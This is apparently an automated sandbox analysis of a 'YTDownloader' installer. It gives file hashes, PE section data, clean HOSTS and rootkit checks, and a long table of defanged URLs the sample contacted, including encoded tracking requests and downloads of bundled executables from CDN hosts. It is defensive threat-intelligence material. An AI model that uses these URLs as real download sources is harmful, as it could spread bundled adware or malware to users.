ae869a8e3ff2a50f4e0ab0ca8ffea24f	c:\Program Files\YTDownloader\YTDownloader.exe
c42b696967ede7fe7dff519e54533988	c:\Program Files\YTDownloader\converter.exe
fbb160d9fc7ba584b627e0267d0b8043	c:\Program Files\YTDownloader\libeay32.dll
e519f2bf8d35627aa8c712aa636f52ff	c:\Program Files\YTDownloader\rtmpdump.exe
b1109b0f24ddf0cc22777e7a8138e9fd	c:\Program Files\YTDownloader\sbmntr.sys
c0ca162d62aedd6e7d179ed6bc6c102e	c:\Program Files\YTDownloader\ssleay32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name:
Product Version: 2.8.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.8.0.999
File Description:
Comments:
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	870447	870912	4.35099	3a7c1eb4c9b2cdfb30bb1c53ad894eec
.rdata	876544	259988	260096	3.0043	0d00c98c802818cc0883b166dd7b7a2d
.data	1138688	25064	12800	3.17932	dd02da31032a31ccb95103c7fa7b72cc
.rsrc	1167360	244152	244224	4.40217	423050c37f2434333c9c9e1793d8f4d2
.reloc	1413120	42976	43008	4.59394	d9d5899069fdc75bff6a2d73afe4621b

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrevysBL0IwHwhEolvsKoHiSTZUc6Aooj3S5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNYlTZYFVSl7P5bll8sXmM6QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q==	198.232.124.192
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll	54.239.168.93
hxxp://cds.c5z6s5a3.hwcdn.net/spdbt/shoppy/snsch7.exe
hxxp://cds.c5z6s5a3.hwcdn.net/web/gf/all/setup.exe
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqnJyMz45O1xrVtQeXCcg/Fhy2/UUM264sa8NVcbx dWxSReJECB10wJoxWgtYjek0x0XbBjJK/aOU=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=s0jsdppK9OtnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuxxTYwWxYG9WM2wWArmgLQLkUIHBGIcHxGIGRftF69MkkCN9h bV19V1Gg4F6dkBzXUfBgwh1qVrROUvSdX2iqn4U8uoq4rC8jC8FaAJlN651M0VcwJ5frh3qtelLT3faUxGFR6X233hgA9D6a NOqQqDB Pa/ WrFM5s3KGksryS5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcboqKFmkaACc=	198.232.124.192
hxxp://d2bt1dcmxj05l2.cloudfront.net/ShopperProJSFull.exe	54.239.168.112
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXPceMBfl/cy8CFIZ4bs6830kOkPP/ lcqmO6sjIL1AsI2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXFASu7RG65lHSpt9GSHWXQQ9Ss5KWeJ1R3qPv/BEEOxGiq9ZfonCR6Oox6FF19pfqJlifxMfc97cyVb1EWo6eKpVEOys WrB2aQstvfmMt gOHtlA/bkx4QI4IYW7BlwKG/8 ILd4bihRW JECizii0o6CnERxfiY5ZMFGhcknP srAPq35vVlHiPVU04Syd3HQWtXvHms9cSat9AZwcpHGY4UYTTZ1ZhG7I0/ygit1Q==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=2v0SNuZrMFyRcITdAqjv5mByKcxzlv58TwZrOj6glduAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyG1ilf4LTBlruf1mkJJrsh3aBPWykaiHXFOOgkw2kW7w1VF3DkXHmZ3gsKUEsaySJZSXTHO//VDXN2I0qd4G3ExvDbcr2ZCWDFAL52sIXt4UoKtXISWiV4lHG3D5R3V5O0a/7yn1m/tGd3P3SqySAb8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i/TyjmwB5PDLPiCC4paVhdKFaiVC/aI3DG654koUNxkC3QPqxzrS768NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1i6nyHpDS4bOY4G r 3F6T7vd0ZIK3zyHSv9W41Hn7OPSVNckomstbKncplbj8o7GcklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1g89M3w jUOHhMAGkRtqR4lD3rLLdbpIg4ArRJ9EKY7l4SdQYeWHlEHJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/YTDownloaderFull.exe	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1j2vh7hk0cgBBQC drCF7eFGvGaf/td2Ate b6qsnxJzJ8pV57JU0YPOPNuNctLNP94FMchecJC7sTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1hQ8FnfYbyw8RQC drCF7eFrF/wZm0XNBk92S527KGfc1 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1ip5hhmFUu/wdCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNmhyT5r/ybNC1vKV8e/iGN5/nnDBjhbCFLZWhEyhE6oA==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gOTLcOqfVOXSmF904v4t2DcTuPEvZOc8eNpxrUgcko41 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBfDzB64tXuwvTTyeb/epMcG1VkxaPlW/GE=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1iSr4DTw5uXZI4G r 3F6T7Ye9UEEkdnkZTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1gHhLicvnhfXymF904v4t2DhvUiLCZht1Hw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YP62O0yjhYNJo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YMtu6Il6K42sySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=eISsn0A7mAYLpXZ/jUeRRk7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT/aaY YTEt5Uvbfo/lsLEXHKYX3Ti/i3YNTTdRaBizOJsTQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRocVwJfcRD1hSQlC/zd7KOiMVqC1aQjPYhHXQCU3Lc8Q3I09qFSwMRx7chrAtAyGHdP0R3cfJ7wsVP0mBGThSfj2Y743nJF0Et2KSc6n6A 69 G16P6Q/NHHP17JfUpG Ji5arKdNEreckyFWuwLl8SUgCLrWouma3IRzlg AfWd4lkaGHrSYSPAUGF/VaQ721H65Q0hM/lq0CiIjt69UWEXAlPNSddhz9LPVA2pp5No30Bplu5X17vgTHWpj//cWf8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoVez2xuA6YrxdKm30ZIdZdA/6UnSy/9g5ij9W2jsh ZY4cGjsXTcXKxAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3cdBa1e8eaz1xJq30BnBykcZjhRhNNnVmEbsjT/KCK3V	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoTp7ys67qImnFAL52sIXt4XOSMm4SbI/lC36 lBzVeTnLb9RQzbrixrw1VxvH51bFJF4kQIHXTAmjFaC1iN6TTGCGrpHNYuwVpXZrelYJPLUrmhU/capljenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIUtlaETKETqg	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=wlkQ3WKgYpSE2rQtmh2LBE7/thpU6drhyMlYLXuYTiRA42sjIUwa/zzxOZpJlWOiLntfO9v5CwenNguChnjFY2aHJPmv/Js0LW8pXx7 IY3n ecMGOFsIT/NjI/ADPAQQR6/4IivvmRHTUVdycsO/XTfhGZ5Y5ZTLhu0b45kiT 2Xfi4eCjhjMjKRY6Iofb7pjurIyC9QLCNmnPWw9zGnUjefKmcoAknBKVVzEMwyJ3sIbAGqmciw6mj USOl4CUHMVy4A0ZhyzpBU9U/r/dsNyvhlGeipNV6LgZQ8/fOZCiThn9Pg6 S4c9vITM5TWw	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=NVqRyNkruopnA3VLGqrT9ZRvgxYrA1OWaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3WLazpewXw1jk8Kba5gyWOQTxIUcsgQ wHN378SfA9Jw2vwNjRSVjtK08O3cXugjd nyapwjUqvQzsAhT5Gds122TndWfocfATyDhi3Wnjo0frAy8J59dd9rgBtSK5GMJ2nwKHV4nKhQuTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45GNURXUmydpYo7BIbpw2ovu3bfNrUBKNV	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=j7YMo/n29XMqqDJt46TNcYgi1NSnhIRtqIy9bCyCQhEoHZkq4q5Phd7OavnCxccsIR1sKxPFdTeokOeVQ5E0okWABgPsiU45GNURXUmydpYo7BIbpw2ovkf72qWT44FpQS3i7uWq3ezON/xOlvEs7vfzzreFiaRhN0IP0XA xvtgKkdlz1lRoY09ECF87Zuss IILilpWF1SqCHr/94rW31vzipeVYvpr maR6b3/MexiezSykY/Z1O8xmMRVWZOb7j5JAyiJ5DwvGnwcuiCjBHn3WtPO7TkPk55LBQN29raE2JuypHmFWVSvOHNjNGnChhLYWo4Y/ac5Rhs262b79EFhM2/f2sowhNepyLa8nM=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=2UW/O98m6H IItTUp4SEbaiMvWwsgkIRKB2ZKuKuT4UgLxC0aXqYrUEev CIr75kR01FXcnLDv1034RmeWOWUy4btG OZIk/mETyJyixTFVdn5IXPnT9 7PiCC4paVhdJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AmkdnXmY5ntEg==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/29451.ashx?e=QHucCbLl /YLjT49fHfOTNcxGaPWyPpOjvdcLv9L0ULeyzV7AofXlljJzRxQxlEZ1rD0MhBpqdxv2upuoN/OX9aoPZj94HyT6LOwEGQvh2zV2TxY7/sL 44G r 3F6T7U6q7EvjWjEUpXTEKkNwLoRunJOmEe2tAEhmPvvKOaBJnrd89FhtM2ZOzMpVjzF1DJ1ANLsSNCmXNcQlgX3M502CabnGOYGWke9dSH 2S3SkStAZytkA54Y0S1nWxf2ZUZB6PWEkv//ugKlGaFWGmKrPJ0DN QuCj69QxV3C0qdKM1YNJ72n7uZgdETUPvQcwTankT3jqoI2swAhmPgoCunql2mR Jit5KoEjale7vIkdwEEqSCVwe/XD m2Vx1YJfOER8y559W1zAMMqIil745kZsURn/cxRj0 9JT4bx2oSZGh8MbdFFu4wvto3IW74upP5ChEmpd9HHVSuTi6RR1XT8KlLqjsANNN69riqxp5Z6LbpmNmFGDM2//e6a6AB1jT1RV/Lug9w/ UOvq3TV Xppilwb9x1QlTW7EcYYqf7r2hVIG5LbdW/BKYnNEj4sapDP2xI5hXE0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/16779.ashx?e=lnyQOXBgnIVgcinMc5b fOZ2TvHobpl2gDEcVfgp pZ7HO4WybUyRwxxlwe2BTjxgKpDK3pk7tXSS26A4HrgseLt6BhzfOsD0FbaakihgO1P17LdzRwGrcSywkF18Bl8YJpucY5gZaSI0uO8YCaEeHDt BwvUvK2OgXCEuEQ35bsk4IDaVDumfJR9y36AE8VUGeTCBaEQyQbe1ZN3pnb6zFxU5LviUXKRAQGkVD7mhWSCPTBz14MxScKZA7dr10wk5dpEt5PL7oIA44xPc2qom7c1W87ggrF6pqgVuVy 5fSGC/Mdcm7G BVy60SFak6tdBGbMT LaxCJELGDzYIEpSUHtL8QyxMw7HQ6UOrRmFylapLWfWeiOW7pPhPxmIJtngDOyc8OrMEe0ZxYaO0Z4LoX04Ef5YGASU331c/hmepeLfZWAU/ElPUufE6DKY9IO4kHWBb6nL9K5zKpbLSx0xM JMmHOf/3UB03ZmLOoILqrHF8gCihnYL0wot9Xvv4NbB6ns3CLtRDh0wyVSH8C6m5ZQjWuuGCVpHDePMpxUsF scXI mWdCbM6EeiW ZX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8WY515bwKb4/A==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpVrvBOGo5I8L8Nh3QJEALW3TAEnwHOHrhhSSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZUJD JjGgvFhGLn0MD/WjZWexOfnH1gmTKsGcMQF H3w==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=QgW8pN5r26ZQhScA1jb3T4/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMA8vsH YHvRtveyr8vVjKUos IILilpWF0OiEhuPxDpViqw Gsnisvn8SJA d bWCFI/522fKenZo2ac9bD3MadSN58qZygCScEpVXMQzDInewhsAaqZyLDqaP5RI6XgJQcxXLgDRmHLOkFT1T v92w3K GUZ6Kk1XouBlDz985kKJOGf0 Dr5Lhz28hMzlNbA=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=rdr4ABua5zdnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilEoPfCrfVvRJhQC drCF7eF8q1Ber6XmkpQzH1M0FuaRLhj0DU1QbcRtcNvMmRKJ05TvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKMITXqci2vJz	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=KC46TpkJIZx8NmhuTfZHgDyMpz1LiwuqKEhxUiTGHeVXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRpwoYS2FqOGP2nOUYbNutm /RBYTNv39rKBTIpR gV745zbBYCuaAtAuRQgcEYhwfEYgZF 0Xr0ySrXIxNf6X/p9WOvghCBTr/TdVMo67fxO0s IILilpWF27wThqOSPC/DYd0CRAC1t0wBJ8Bzh64YUklpIg/vGiFhQGw7w7bWmjz7d9KaLD84/d0InrHGn4CTEJJ99zQJTqVYgO0yHAHEsYAqi 8bJ4kL0puLqbigJGVCQ/iYxoLxYRi59DA/1o2VnsTn5x9YJkyrBnDEBfh98=	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=aUlNCxxkjnRnA3VLGqrT9ZTha5n8fKHmaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO31QHs3X92ilHJn1GegIILyOsrHZsRsIfMRhg0WUsz0XmIajF ylV 6H8YWruN4e6MTuXTWi43QJYJW50WOaC75x7mM32iDekcU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0acKGEthajhj9pzlGGzbrZvv0QWEzb9/ayjCE16nItrycw==	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=PcwT4QFtuPClUB4b/muCJY/h8s/3htVFnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZBVWaKclJYCzDHGXB7YFOPGAqkMremTu1SEeEcwb8K7i333RAvM0VMCMAVuazOQA/ySFcG0T/jYU B 0jBTIO6c73FtBcCD66pyI/h/Xw7wdFAL52sIXt4Xfzqkf5HpieYAG6kIeOqURJJaSIP7xohYUBsO8O21po8 3fSmiw/OP3dCJ6xxp AkxCSffc0CU6lWIDtMhwBxLGAKovvGyeJC9Kbi6m4oCRlQkP4mMaC8WEYufQwP9aNlZ7E5 cfWCZMqwZwxAX4ff	198.232.124.192
hxxp://mpjqoj7o-zxis6jz8.netdna-ssl.com/27944.ashx?e=W5y9y1UrGBlnA3VLGqrT9aPuao ctN6paMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVei4GUPP3zmQok4Z/T4Ovkuz5fT/liGMLakO9/DuORuprIIa1xct7ImgSuC5ggBR9HtwqKQD7HO3eqfOL09Waq7Xt7qcDfFhJwTxIUcsgQ wWDLNdKr8lliPhNVb7n8lt8TQfYT78rW6o JhFVUwrL/KKMB ON7 S1TM8xmV4vn5a7srxy/100X021585MfhSh3bXYBh5GayOJOBpub70rIbWKV/gtMGWu5/WaQkmuyHmpRoHgsHgME=	198.232.124.192
